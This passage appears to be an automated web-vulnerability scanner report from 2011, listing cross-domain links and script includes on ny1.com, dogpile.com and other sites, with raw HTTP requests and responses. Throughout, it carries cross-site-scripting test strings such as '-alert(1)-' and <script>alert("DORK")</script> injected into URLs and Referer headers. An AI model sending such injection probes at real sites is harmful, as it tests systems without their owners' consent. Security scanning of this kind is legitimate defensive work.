http://ad.doubleclick.net/jump/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=300x250;ord=123456789?

Request

GET /Content/ServeContent.aspx?id=693&ticks=73882 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 1091
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:32 GMT
Date: Fri, 01 Apr 2011 18:10:32 GMT
Connection: close

<div id="f5a91888-1a04-40dd-a990-97a63a4ec801">

<script language="JavaScript" type="text/javascript">
if (typeof ord=='undefined') {ord=Math.
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=300x250;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt="">
</a>
...[SNIP]...

11.66. http://www.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=567

The response contains the following links to other domains:

http://twitter.com/NY1OneOn1
http://twitter.com/NY1arts
http://twitter.com/NY1headlines
http://twitter.com/NY1onstage
http://twitter.com/NY1thecall
http://twitter.com/NY1weather
http://twitter.com/SportsOn1

Request

GET /Content/ServeContent.aspx?iframe=1&id=567 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 957
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:33 GMT
Date: Fri, 01 Apr 2011 18:10:33 GMT
Connection: close

<div id="a3b398b4-d130-4b5a-bfa4-c6a24932293d"><style type="text/css">@import "/App_Skins/Global/Styles/iframeContent.css";</style><div style="width:300px; background-color:#B7E0F6; layer-background-c
...[SNIP]...
<b>FOLLOW US:  
<a href='http://twitter.com/NY1headlines' target='_blank'>
NY1headlines</a>
| <a href='http://twitter.com/NY1weather' target='_blank'>
NY1weather</a>
| <a href='http://twitter.com/NY1thecall' target='_blank'>
NY1thecall</a>
| <a href='http://twitter.com/NY1arts' target='_blank'>
NY1arts</a>
| <a href='http://twitter.com/NY1onstage' target='_blank'>
NY1onstage</a>
| <a href='http://twitter.com/NY1OneOn1' target='_blank'>
NY1OneOn1</a>
| <a href='http://twitter.com/SportsOn1' target='_blank'>
SportsOn1</a>
...[SNIP]...

11.67. http://www.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ny1.com/Content/ServeContent.aspx?id=690&ticks=260759

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/twc.ny1/topstories-allboroughs;pos=bottom;twc=ad;tile=4;sz=160x600;ord=123456789?
http://ad.doubleclick.net/jump/twc.ny1/topstories-allboroughs;pos=bottom;twc=ad;tile=4;sz=160x600;ord=123456789?

Request

GET /Content/ServeContent.aspx?id=690&ticks=260759 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 1103
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:35 GMT
Date: Fri, 01 Apr 2011 18:10:35 GMT
Connection: close

<div id="b9e8dfd3-a2f6-4897-bb2c-3a9c9768b73c">

<script language="JavaScript" type="text/javascript">
if (typeof ord=='undefined') {ord=Ma
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/twc.ny1/topstories-allboroughs;pos=bottom;twc=ad;tile=4;sz=160x600;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/twc.ny1/topstories-allboroughs;pos=bottom;twc=ad;tile=4;sz=160x600;ord=123456789?" width="160" height="600" border="0" alt="">
</a>
...[SNIP]...

11.68. http://www.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=904

The response contains the following link to another domain:

http://www.beatthetraffic.com/widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork&inrix=1&items=3&link=&code=0&ts=4&rc=false

Request

GET /Content/ServeContent.aspx?iframe=1&id=904 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 874
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:33 GMT
Date: Fri, 01 Apr 2011 18:10:33 GMT
Connection: close

<div id="1a09702d-64db-4c60-ac1a-8578ea86c8f1"><style type="text/css">@import "/App_Skins/Global/Styles/iframeContent.css";</style><div style="position:relative; z-index:2; width:300px; height:108px;"
...[SNIP]...
<div id='outerdiv'>
<iframe src="http://www.beatthetraffic.com/widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork&inrix=1&items=3&link=&code=0&ts=4&rc=false" id='inneriframe' scrolling=no></iframe>
...[SNIP]...

11.69. http://www.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=689

The response contains the following links to other domains:

http://twitter.com/NYCASP
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/NYCASP.json?callback=twitterCallback2&count=1

Request

GET /Content/ServeContent.aspx?iframe=1&id=689 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 670
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:32 GMT
Date: Fri, 01 Apr 2011 18:10:32 GMT
Connection: close

<div id="2bab76b1-4fca-462c-a6b8-d57e69252aae"><style type="text/css">@import "/App_Skins/Global/Styles/iframeContent.css";</style><div id="twitter_div">
<center><h2 class="sidebar-title"><a href='http://twitter.com/NYCASP' target='_blank'>NYC ALTERNATE SIDE PARKING INFO</a>
...[SNIP]...
</ul>
<a href="http://twitter.com/NYCASP" id="twitter-link" style="display:block;text-align:right;"></a>
</div>
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/NYCASP.json?callback=twitterCallback2&count=1"></script>
...[SNIP]...

11.70. http://www.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ny1.com/Content/ServeContent.aspx?id=692&ticks=626518

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/twc.ny1/topstories-allboroughs;pos=bottom;twc=ad;tile=4;sz=300x250;ord=123456789?
http://ad.doubleclick.net/jump/twc.ny1/topstories-allboroughs;pos=bottom;twc=ad;tile=4;sz=300x250;ord=123456789?

Request

GET /Content/ServeContent.aspx?id=692&ticks=626518 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 1103
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:29 GMT
Date: Fri, 01 Apr 2011 18:10:29 GMT
Connection: close

<div id="a16d56d8-d26a-4cd5-8465-af45968d670b">

<script language="JavaScript" type="text/javascript">
if (typeof ord=='undefined') {ord=Ma
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/twc.ny1/topstories-allboroughs;pos=bottom;twc=ad;tile=4;sz=300x250;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/twc.ny1/topstories-allboroughs;pos=bottom;twc=ad;tile=4;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt="">
</a>
...[SNIP]...

11.71. http://www.ny1.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/favicon.ico

Issue detail

The page was loaded from a URL containing a query string:

http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1

The response contains the following links to other domains:

http://c.mojopages.com/mstatic/styles/widgets/reset-v1.css
http://newsgecko.com/
http://ny1noticias.com/
http://timewarnercable.com/
http://twitter.com/NY1headlines
http://www.adobe.com/go/EN_US-H-GET-FLASH
http://www.google.com/support/bin/answer.py?answer=23852
http://www.mojopages.com/
http://www.tipit.net/

Request

GET /favicon.ico?80003'-alert(1)-'46fe3f653ad=1 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56047
Vary: Accept-Encoding
Cache-Control: public, max-age=599
Expires: Fri, 01 Apr 2011 18:20:35 GMT
Date: Fri, 01 Apr 2011 18:10:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
</script><a href="http://timewarnercable.com" target="_blank"><span class="hidden">
...[SNIP]...
<li><a href="http://twitter.com/NY1headlines" title="Follow us on Twitter">Twitter</a></li><li class="last"><a href="http://ny1noticias.com" title="NY1.com en Espa..ol">NY1.com en Espa..ol</a>
...[SNIP]...
<span class="missingJS">enable JavaScript. <a href="http://www.google.com/support/bin/answer.py?answer=23852"
title="How to enable JavaScript">Learn how</a>
...[SNIP]...
<span class="missingFlash">install Adobe Flash 9 or above. <a href="http://www.adobe.com/go/EN_US-H-GET-FLASH"
title="Install Adobe Flash player">Install now</a>
...[SNIP]...
<div class="mojofooter">
<link rel="stylesheet" href="http://c.mojopages.com/mstatic/styles/widgets/reset-v1.css" type="text/css"/>
<link rel="stylesheet" href="http://content.ny1.com/pages/styles/mediumRectangle-v2ny1.css" type="text/css"/>
...[SNIP]...
<div class="mpAttribution">
<a href="http://www.mojopages.com"><span style="color: #000000;">
...[SNIP]...
<p><a href="http://www.tipit.net">Web production</a> by <a href="http://www.tipit.net">Tipit</a> — Powered by <a href="http://newsgecko.com">News Gecko</a>
...[SNIP]...

11.72. http://www.quickyellow.com/includes/all.topcategories.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.quickyellow.com
Path:	/includes/all.topcategories.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.quickyellow.com/includes/all.topcategories.cfm?category=Restaurants&city=Sioux+Falls&state=SD

The response contains the following link to another domain:

http://www.dexknows.com/images/dir3.gif?partner=qy&dkcat=a2deb066-8a33-4321-8530-331b0d2c1886&dkgeo=c-sioux_falls-sd&dkq=restaurants&dkloc=sioux+falls+sd&mwids=430171%401%402%7C&mkt=CD1022

Request

GET /includes/all.topcategories.cfm?category=Restaurants&city=Sioux+Falls&state=SD HTTP/1.1
Host: www.quickyellow.com
Proxy-Connection: keep-alive
Referer: http://www.quickyellow.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=61172381; CFTOKEN=21256190; LOCATION.CITY=Sioux%20Falls; LOCATION.STATE=SD; LOCATION.COUNTRY=US; LOCATION.URL=sioux%5Ffalls%2Dsd; __utmz=19243239.1301681500.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19243239.235936714.1301681500.1301681500.1301681500.1; __utmc=19243239; __utmb=19243239.1.10.1301681500

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<div id="listings">

<div id="listing">
<a href="/trk?go=http%3A%2F%2Fwww%2Edexknows%2Ecom%2Frd%2Findex%2Easp%3Fdkid%3D430171%26act%3D1%26pdt%3Dpienhanced%26partner%3Dqy%2
...[SNIP]...
</div>
<img src="http://www.dexknows.com/images/dir3.gif?partner=qy&dkcat=a2deb066-8a33-4321-8530-331b0d2c1886&dkgeo=c-sioux_falls-sd&dkq=restaurants&dkloc=sioux+falls+sd&mwids=430171%401%402%7C&mkt=CD1022" height="0" width="0" border="0" />

<div id="clear">
...[SNIP]...

12. Cross-domain script include previous next
There are 100 instances of this issue:

http://ad.amgdgt.com/ads/
http://cim.meebo.com/cim/init.php
http://dogpile.com/
http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11
http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://ecards.myfuncards.com/myfuncards/404
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://investor.infospaceinc.com/phoenix.zhtml
http://manhattan.ny1.com/App_Skins/News1/Scripts/functions.js
http://manhattan.ny1.com/Content/ServeContent.aspx
http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://s.aeriagames.com/misc/ads/error_banner_en.html
http://www.2theadvocate.com/favicon.ico
http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
http://www.beatthetraffic.com/widgets/traveltimes.aspx
http://www.cambridge.org/uk/catalogue/viewBasket.asp
http://www.carolwrightgifts.com/favicon.ico
http://www.clairol.com/favicon.ico
http://www.courtcareers.com/favicon.ico
http://www.covergirl.com/favicon.ico
http://www.crosswalk.com/favicon.ico
http://www.dogpile.com/
http://www.dogpile.com/dogpile/ws/about/
http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/faq/
http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/
http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index
http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7
http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes
http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant
http://www.dogpile.com/dogpile_rss/web/MLB+Schedule
http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/
http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11
http://www.hy-vee.com/favicon.ico
http://www.jillianmichaels.com/favicon.ico
http://www.mercantila.com/
http://www.nolo.com/favicon.ico
http://www.ny1.com/App_Skins/News1/Scripts/functions.js
http://www.ny1.com/Content/ServeContent.aspx
http://www.pg.com/favicon.ico
http://www.phonedog.com/favicon.ico
http://www.qctimes.com/favicon.ico
http://www.soccer.com/favicon.ico
http://www.tonzr.com/favicon.ico
http://www.wkyt.com/favicon.ico
http://www.wndu.com/favicon.ico
http://www.wsaz.com/favicon.ico

12.1. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following scripts from other domains:

http://servedby.adxpose.com/adxpose/find_ad.js
http://redcated/TLC/jview/253732017/direct/01/rnd=165539639?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUyW30Qztm7SXZXbccXK3nvwjZkkdnZW8sdXNhLHQsMTMwMTY4MTQ2NzQ3MCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUNBSUVBQUFBQUFBSUFnUUFBQUFFQXpNd3RBcEhBOUN0Y2pJMENrY0QwSzF5TWpRSmhtdmRXV2ZrRWZ2TnYyaTZnX0NqNDNGWlpOQUFBQUFPZ3VBQUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0NrREdVQXVRNEJBZ1VDQUFRQUFBQUFqQnZGeUFBQUFBQS4vY25kPSFUQV9obXdqYzh3SVF4OGtLR0FBZzBjY0JLR1V4TXpNekVkY2pJMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllwQmxnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJPZF82TmhXV1RjRGFQSTcxbEFmaHZxV0lCTmZxLU5NQmw2R1U3Qmkzek9MY0hBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESkJvSUJGMk5oTFhCMVlpMDRPREkxT0RreE5UZ3lNakUxTURRMW9BSEQ4djNzQTdJQkUzZDNkeTV4ZFdsamEzbGxiR3h2ZHk1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTV4ZFdsamEzbGxiR3h2ZHk1amIyMHZtQUs2UU1BQ0JNZ0NoZExQQ3FnREFlZ0QtUUxvQTdrSTZBUGdLdWdEQV9VREFBQUF4SUFHNmNTRjlNV1Exb2t5Jm51bT0xJnNpZz1BR2lXcXR6WkFCQ1VQT1ZrdWsxb3lQMEtiRjh0cWtsOVNRJmNsaWVudD1jYS1wdWItODgyNTg5MTU4MjIxNTA0NSZhZHVybD0K/clkurl=
http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
